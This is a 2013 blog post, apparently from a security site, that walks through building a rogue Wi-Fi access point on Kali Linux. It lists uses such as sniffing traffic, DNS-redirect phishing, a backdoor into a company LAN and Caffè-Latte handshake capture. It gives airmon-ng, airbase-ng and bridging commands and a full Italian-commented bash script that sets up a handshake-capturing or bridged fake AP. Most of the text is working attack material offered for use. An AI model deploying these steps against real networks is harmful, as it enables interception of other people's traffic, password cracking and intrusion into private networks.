Rougue Access Point using Kali Linux

Peru — Fri, 20 Sep 2013 10:07:44 +0000

A Rougue Access Point (RAP) is a fake wifi connection that can be used to sniff information.
Basically you have a PC (Kali Linux live in this case) with 2 interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card will be configured as AccessPoint (AP) and a bridge will be created to link wired and wireless connections.
When a user connects to the new hot spot created, his data are bridged, through the PC, to the wired connection and proxed to the destination (internet).
I use for these operations airbase-ng command (aircrack-ng suite).

Some scenarios:
– Sniffing traffic
I setup a RAP and start wireshark, ettercap or another network sniffer. Every connections that pass through my PC are intercepted.
– Phishing
I setup a RAP and force it to use mine DNS Server. If someone will connects to me and start to surf I am able to redirect traffic using my DNS. In this case I can implement some kind of phishing.
– Company network back door
I setup, may be using a small RaspberryPi, an access point using the Company network as wired interface. This is an hot spot directly connectet to the Company LAN.
– Caffè-Latte attack
Locoking at the wireless packets you can see the client trying to connect to the previusly registred access point (eg. MY_NETWORK). I Can setup an access point using the same SID the client is searching for. When the client, that is serching for a known SSID, find my RAP named MY_NETKORK it immediatly try to connect. I can use this connection to sniff WPA handshakes or WEP packets and try to decode passwords.
– Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on-the-fly.

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected
– wlan0, a wireless interface able to be setted up in monitor mode

I start the monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface.
Now I setup an AP on mon0, named “MY_network”, channel 11 and WEP autentication. I can also set it as a free wifi without password (airbase-ng --help).

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface.
Now the AP is started, in another terminal window I make a bridge named rougue-bridge and link at0 to eth0 using the bridge-utils. Note that in Kali Linux the bridge-utils have to be installed (apt-get install bridge-utils) in order to use brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0. This is because the two interfaces are now integrated in the virtual bridge and don’t need an IP anymore:

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I need also the IP forwarding:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

At the end I configure the test-bridge. Differently from eth0 and ap0 the bridge needs an IP of the LAN where eth0 is connected.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1

Note that these are temporary operations that will be discarded by rebooting the system.

Extra
Starting an AP to sniffing handshake.

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap wlan0

-z sets WPA1 tags (2 = TKIP)
-W set WEP flag in beacons. The option -W 1 is recommended when using -z or -Z
-F where to store the cap file.

Here’s my old simple script to start a Rougue Access Point using Linux Bash. It may need some adjustment, but I think it will work.

#!/bin/sh
echo "---------------------------------------"
echo "Script per la creazione di un Rougue AP"
echo "---------------------------------------"
echo "Digita"
echo " Per creare un Rougue AP per la cattura dell'handshake digita ----> 1"
echo " Per creare un Rougue AP per condividere la connessione digita ---> 2"
read CHOSE1
if [ "${CHOSE1}" == "1" ]
then
#Inizio creazione AP per cattura handshake
echo
echo "Creazione AP per cattura handshake"
echo
echo "Quale essid vuoi utilizzare?"
read ESSID1
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN1
echo "IL file con i pacchetti è salvato in /tmp/${ESSID1}.cap"
ifconfig wlan0 down
airmon-ng start wlan0
airbase-ng -c ${CHAN1} -e ${ESSID1} -z 2 -W 1 -F /tmp/${ESSID1}.cap wlan0
#Fine creazione AP per cattura handshake
read
elif [ "${CHOSE1}" == "2" ]
then
#Inizio creazione AP per condivisione connessione
echo
echo "Creazione AP per condivisione connessione"
echo
echo "Faccio partire la funzionalità di monitoring su wlan0"
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creo un AP sull'interfaccia virtuale at0"
echo "Quale essid vuoi utilizzare?"
read ESSID
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN
echo "Impostare una password? (y/n)"
read CHOSE2
if [ "${CHOSE2}" == "y" ]
then
gnome-terminal --geometry 83x19 -x bash -c "
echo "La password è stata impostata di default WEP abcdefabcdefabcdefabcdef12"
airbase-ng --essid ${ESSID} -c ${CHAN} -w abcdefabcdefabcdefabcdef12 mon0"
else
echo "La password non è stata impostata"
gnome-terminal --geometry 83x19 -x bash -c "
airbase-ng --essid ${ESSID} -c ${CHAN} mon0"
fi
echo "Creo l'interfaccia br0 bridge vi ecollego eth0 e at0"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Inserisci i dati per nuova interfaccia bridge creata"
echo -n "Indirizzo ip:"
read IP
echo -n "Netmask:"
read NETMASK
echo -n "Broadcast:"
read BROAD
echo -n "Gateway:"
read ROUTE
ifconfig br0 ${IP} netmask ${NETMASK} broadcast ${BROAD} up
route add default gw ${ROUTE}
#Fine creazione AP per condivisione connessione
read
else
echo "Scelta non corretta premere invio per uscire dal programma."
read
fi

handshake – GoSecure!

Rougue Access Point using Kali Linux